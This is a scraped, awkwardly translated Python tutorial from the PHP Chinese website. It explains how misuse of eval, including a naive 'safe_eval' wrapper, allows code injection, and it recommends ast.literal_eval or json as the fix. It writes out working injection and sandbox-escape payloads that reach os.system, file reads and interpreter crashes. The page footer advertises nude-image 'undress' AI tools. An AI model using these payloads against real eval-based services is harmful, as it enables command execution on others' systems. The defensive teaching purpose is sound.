Backend Development
Python Tutorial
Introduction to common error encapsulation and utilization principles of Python eval
Introduction to common error encapsulation and utilization principles of Python eval
This article brings you an introduction to the common error encapsulation and utilization principles of Python eval. It has certain reference value. Friends in need can refer to it. I hope it will be helpful to you.
Recently during the code review process, I found that there are many problems with code injection caused by incorrect use of eval. A typical one is to use eval as parsing dict. Some simply use eval, and some use wrong encapsulation. eval is used by all products, which leads to more serious problems. These are bloody lessons, so everyone should pay more attention when using them.
The following is an example of an actual product. For details, see [bug83055][1]:
def remove(request, obj):
query = query2dict(request.POST)
eval(query['oper_type'])(query, customer_obj)The query is directly converted from POST and can be directly controlled by the user. If the user Enter oper_type=__import__('os').system('sleep 5') in the url parameter, and you can execute the sleep command. Of course, you can also execute any system command or any executable code. The harm is obvious, so let's take a look at eval What exactly does it do, and how to do it safely?
1, what to do
Simply put, it is to execute an expression
>>> eval('2+2')
4
>>> eval("""{'name':'xiaoming','ip':'10.10.10.10'}""")
{'ip': '10.10.10.10', 'name': 'xiaoming'}
>>> eval("__import__('os').system('uname')", {})
Linux
0From these three pieces of code, the first one is obviously used for calculation, and the second one is for calculation A data type that converts string type data into python, here is dict. This is also a common mistake in our products. The third one is what the bad boy does, executing system commands.
eval can accept three parameters, eval(source[, globals[, locals]]) -> value
globals must be a path, and locals must be a key-value pair, which is taken by default System globals and locals
2, incorrect encapsulation
(1) Let’s look at a section of the encapsulation function in one of our product codes, see [bug][2], or network Search for codes with higher rankings, eg:
def safe_eval(eval_str):
try:
#加入命名空间
safe_dict = {}
safe_dict['True'] = True
safe_dict['False'] = False
return eval(eval_str,{'__builtins__':None},safe_dict)
except Exception,e:
traceback.print_exc()
return ''Here __builtins__ is set to empty, so built-in variables like __import__ are gone. Is this encapsulated function safe? Let me go step by step:
>>> dir(__builtins__) ['ArithmeticError', 'AssertionError', 'AttributeError', 'BaseException', 'BufferError', 'BytesWarning', 'DeprecationWarning', 'EOFError', 'Ellipsis', 'EnvironmentError', 'Exception', 'False', 'FloatingPointError', 'FutureWarning', 'GeneratorExit', 'IOError', 'ImportError', 'ImportWarning', 'IndentationError', 'IndexError', 'KeyError', 'KeyboardInterrupt', 'LookupError', 'MemoryError', 'NameError', 'None', 'NotImplemented', 'NotImplementedError', 'OSError', 'OverflowError', 'PendingDeprecationWarning', 'ReferenceError', 'RuntimeError', 'RuntimeWarning', 'StandardError', 'StopIteration', 'SyntaxError', 'SyntaxWarning', 'SystemError', 'SystemExit', 'TabError', 'True', 'TypeError', 'UnboundLocalError', 'UnicodeDecodeError',
List items
'UnicodeEncodeError', 'UnicodeError', 'UnicodeTranslateError', 'UnicodeWarning', 'UserWarning', 'ValueError', 'Warning', ' ZeroDivisionError', '_', 'debug', 'doc', 'import', 'name', 'package', 'abs', 'all', 'any', 'apply', 'basestring', 'bin' , 'bool', 'buffer', 'bytearray', 'bytes', 'callable', 'chr', 'classmethod', 'cmp', 'coerce', 'compile', 'complex', 'copyright', ' credits', 'delattr', 'dict', 'dir', 'divmod', 'enumerate', 'eval', 'execfile', 'exit', 'file', 'filter', 'float', 'format' , 'frozenset', 'getattr', 'globals', 'hasattr', 'hash', 'help', 'hex', 'id', 'input', 'int', 'intern', 'isinstance', ' issubclass', 'iter', 'len', 'license', 'list', 'locals', 'long', 'map', 'max', 'memoryview', 'min', 'next', 'object' , 'oct', 'open', 'ord', 'pow', 'print', 'property', 'quit', 'range', 'raw_input', 'reduce', 'reload', 'repr', ' reversed', 'round', 'set', 'setattr', 'slice', 'sorted', 'staticmethod', 'str', 'sum', 'super', 'tuple', 'type', 'unichr' , 'unicode', 'vars', 'xrange', 'zip']
From __builtins__, you can see that there is __import__ in its module, which can be used to perform some operations of os. If it is set to empty and then the eval function is executed, the result is as follows:
>>> eval("__import__('os').system('uname')", {'__builtins__':{}})
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 1, in <module>
NameError: name '__import__' is not definedNow it is prompted that __import__ is undefined and cannot be executed successfully. Is it safe? The answer is of course wrong.
For example, the execution is as follows:
>>> s = """
... (lambda fc=(
... lambda n: [
... c for c in
... ().__class__.__bases__[0].__subclasses__()
... if c.__name__ == n
... ][0]
... ):
... fc("function")(
... fc("code")(
... 0,0,0,0,"test",(),(),(),"","",0,""
... ),{}
... )()
... )()
... """
>>> eval(s, {'__builtins__':{}})
Segmentation fault (core dumped)Here the user defines a function, and the call of this function directly causes a segmentation fault
The following code exits the interpreter:
>>>
>>> s = """
... [
... c for c in
... ().__class__.__bases__[0].__subclasses__()
... if c.__name__ == "Quitter"
... ][0](0)()
... """
>>> eval(s,{'__builtins__':{}})
liaoxinxi@RCM-RSAS-V6-Dev ~/tools/auto_judge $Let’s have a preliminary understanding of the whole process:
>>> ().__class__.__bases__[0].__subclasses__() [<type 'type'>, <type 'weakref'>, <type 'weakcallableproxy'>, <type 'weakproxy'>, <type 'int'>, <type 'basestring'>, <type 'bytearray'>, <type 'list'>, <type 'NoneType'>, <type 'NotImplementedType'>, <type 'traceback'>, <type 'super'>, <type 'xrange'>, <type 'dict'>, <type 'set'>, <type 'slice'>, <type 'staticmethod'>, <type 'complex'>, <type 'float'>, <type 'buffer'>, <type 'long'>, <type 'frozenset'>, <type 'property'>, <type 'memoryview'>, <type 'tuple'>, <type 'enumerate'>, <type 'reversed'>, <type 'code'>, <type 'frame'>, <type 'builtin_function_or_method'>, <type 'instancemethod'>, <type 'function'>, <type 'classobj'>, <type 'dictproxy'>, <type 'generator'>, <type 'getset_descriptor'>, <type 'wrapper_descriptor'>, <type 'instance'>, <type 'ellipsis'>, <type 'member_descriptor'>, <type 'file'>, <type 'sys.long_info'>, <type 'sys.float_info'>, <type 'EncodingMap'>, <type 'sys.version_info'>, <type 'sys.flags'>, <type 'exceptions.BaseException'>, <type 'module'>, <type 'imp.NullImporter'>, <type 'zipimport.zipimporter'>, <type 'posix.stat_result'>, <type 'posix.statvfs_result'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class '_abcoll.Hashable'>, <type 'classmethod'>, <class '_abcoll.Iterable'>, <class '_abcoll.Sized'>, <class '_abcoll.Container'>, <class '_abcoll.Callable'>, <class 'site._Printer'>, <class 'site._Helper'>, <type '_sre.SRE_Pattern'>, <type '_sre.SRE_Match'>, <type '_sre.SRE_Scanner'>, <class 'site.Quitter'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <type 'Struct'>, <type 'cStringIO.StringO'>, <type 'cStringIO.StringI'>, <class 'configobj.InterpolationEngine'>, <class 'configobj.SimpleVal'>, <class 'configobj.InterpolationEngine'>, <class 'configobj.SimpleVal'>]
The meaning of this python code is to find the class of tuple, then find its base class, which is object, and then find its subclass through object. , the specific subclass is also the same as the output in the code. You can see from it that there are file module and zipimporter module. Can they be used? First start with file
If the user constructs:
>>> s1 = """
... [
... c for c in
... ().__class__.__bases__[0].__subclasses__()
... if c.__name__ == "file"
... ][0]("/etc/passwd").read()()
... """
>>> eval(s1,{'__builtins__':{}})
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<string>", line 6, in <module>
IOError: file() constructor not accessible in restricted modeThis restricted mode is simply understood as the sandbox of the python interpreter. Some functions are restricted, such as not being able to modify the system or use some System functions, such as file, see Restricted Execution Mode for details. How to bypass it? At this time we thought of zipimporter. If the imported module references the os module, we can use it like the following code.
>>> s2="""
... [x for x in ().__class__.__bases__[0].__subclasses__()
... if x.__name__ == "zipimporter"][0](
... "/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg").load_module(
... "configobj").os.system("uname")
... """
>>> eval(s2,{'__builtins__':{}})
Linux
0This verifies that the safe_eval just now is actually unsafe.
3, how to use
correctly (1) Use ast.literal_eval
(2) If you just convert characters to dict, you can use json format
This article has ended here. For more other exciting content, you can pay attention to the python video tutorial column on the PHP Chinese website!
The above is the detailed content of Introduction to common error encapsulation and utilization principles of Python eval. For more information, please follow other related articles on the PHP Chinese website!
Hot AI Tools
Undress AI Tool
Undress images for free
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Clothoff.io
AI clothes remover
Video Face Swap
Swap faces in any video effortlessly with our completely free AI face swap tool!
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1794
16
1740
56
1591
29
1474
72
267
587
Accessing data from a web API in Python
Jul 16, 2025 am 04:52 AM
The key to using Python to call WebAPI to obtain data is to master the basic processes and common tools. 1. Using requests to initiate HTTP requests is the most direct way. Use the get method to obtain the response and use json() to parse the data; 2. For APIs that need authentication, you can add tokens or keys through headers; 3. You need to check the response status code, it is recommended to use response.raise_for_status() to automatically handle exceptions; 4. Facing the paging interface, you can request different pages in turn and add delays to avoid frequency limitations; 5. When processing the returned JSON data, you need to extract information according to the structure, and complex data can be converted to Data
How to use PHP combined with AI to achieve text error correction PHP syntax detection and optimization
Jul 25, 2025 pm 08:57 PM
To realize text error correction and syntax optimization with AI, you need to follow the following steps: 1. Select a suitable AI model or API, such as Baidu, Tencent API or open source NLP library; 2. Call the API through PHP's curl or Guzzle and process the return results; 3. Display error correction information in the application and allow users to choose whether to adopt it; 4. Use php-l and PHP_CodeSniffer for syntax detection and code optimization; 5. Continuously collect feedback and update the model or rules to improve the effect. When choosing AIAPI, focus on evaluating accuracy, response speed, price and support for PHP. Code optimization should follow PSR specifications, use cache reasonably, avoid circular queries, review code regularly, and use X
Completed python blockbuster online viewing entrance python free finished website collection
Jul 23, 2025 pm 12:36 PM
This article has selected several top Python "finished" project websites and high-level "blockbuster" learning resource portals for you. Whether you are looking for development inspiration, observing and learning master-level source code, or systematically improving your practical capabilities, these platforms are not to be missed and can help you grow into a Python master quickly.
Python for Quantum Machine Learning
Jul 21, 2025 am 02:48 AM
To get started with quantum machine learning (QML), the preferred tool is Python, and libraries such as PennyLane, Qiskit, TensorFlowQuantum or PyTorchQuantum need to be installed; then familiarize yourself with the process by running examples, such as using PennyLane to build a quantum neural network; then implement the model according to the steps of data set preparation, data encoding, building parametric quantum circuits, classic optimizer training, etc.; in actual combat, you should avoid pursuing complex models from the beginning, paying attention to hardware limitations, adopting hybrid model structures, and continuously referring to the latest documents and official documents to follow up on development.
PHP calls AI intelligent voice assistant PHP voice interaction system construction
Jul 25, 2025 pm 08:45 PM
User voice input is captured and sent to the PHP backend through the MediaRecorder API of the front-end JavaScript; 2. PHP saves the audio as a temporary file and calls STTAPI (such as Google or Baidu voice recognition) to convert it into text; 3. PHP sends the text to an AI service (such as OpenAIGPT) to obtain intelligent reply; 4. PHP then calls TTSAPI (such as Baidu or Google voice synthesis) to convert the reply to a voice file; 5. PHP streams the voice file back to the front-end to play, completing interaction. The entire process is dominated by PHP to ensure seamless connection between all links.
How to use PHP to develop product recommendation module PHP recommendation algorithm and user behavior analysis
Jul 23, 2025 pm 07:00 PM
To collect user behavior data, you need to record browsing, search, purchase and other information into the database through PHP, and clean and analyze it to explore interest preferences; 2. The selection of recommendation algorithms should be determined based on data characteristics: based on content, collaborative filtering, rules or mixed recommendations; 3. Collaborative filtering can be implemented in PHP to calculate user cosine similarity, select K nearest neighbors, weighted prediction scores and recommend high-scoring products; 4. Performance evaluation uses accuracy, recall, F1 value and CTR, conversion rate and verify the effect through A/B tests; 5. Cold start problems can be alleviated through product attributes, user registration information, popular recommendations and expert evaluations; 6. Performance optimization methods include cached recommendation results, asynchronous processing, distributed computing and SQL query optimization, thereby improving recommendation efficiency and user experience.
How to join a list of strings in Python
Jul 18, 2025 am 02:15 AM
In Python, the following points should be noted when merging strings using the join() method: 1. Use the str.join() method, the previous string is used as a linker when calling, and the iterable object in the brackets contains the string to be connected; 2. Make sure that the elements in the list are all strings, and if they contain non-string types, they need to be converted first; 3. When processing nested lists, you must flatten the structure before connecting.
Python web scraping tutorial
Jul 21, 2025 am 02:39 AM
To master Python web crawlers, you need to grasp three core steps: 1. Use requests to initiate a request, obtain web page content through get method, pay attention to setting headers, handling exceptions, and complying with robots.txt; 2. Use BeautifulSoup or XPath to extract data. The former is suitable for simple parsing, while the latter is more flexible and suitable for complex structures; 3. Use Selenium to simulate browser operations for dynamic loading content. Although the speed is slow, it can cope with complex pages. You can also try to find a website API interface to improve efficiency.
